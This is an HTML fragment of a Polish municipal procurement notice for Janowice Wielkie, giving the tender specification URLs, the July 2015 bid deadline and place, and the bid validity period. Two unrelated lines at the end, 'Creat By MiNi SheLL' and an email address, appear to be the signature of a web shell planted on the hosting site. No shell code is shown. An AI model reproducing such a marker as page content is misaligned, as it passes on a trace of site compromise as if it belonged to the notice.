<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.janowicewielkie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.gmina.janowice.wielkie.sisco.info/?id=2280.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2015 godzina 09:00, miejsce: Oferty należy składać do dnia  15.07.2015 r, godz. 9:00 w sekretariacie Urzędu Gminy w Janowicach Wielkich, ul. Kolejowa 2, 58-520 Janowice Wielkie (I piętro)...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com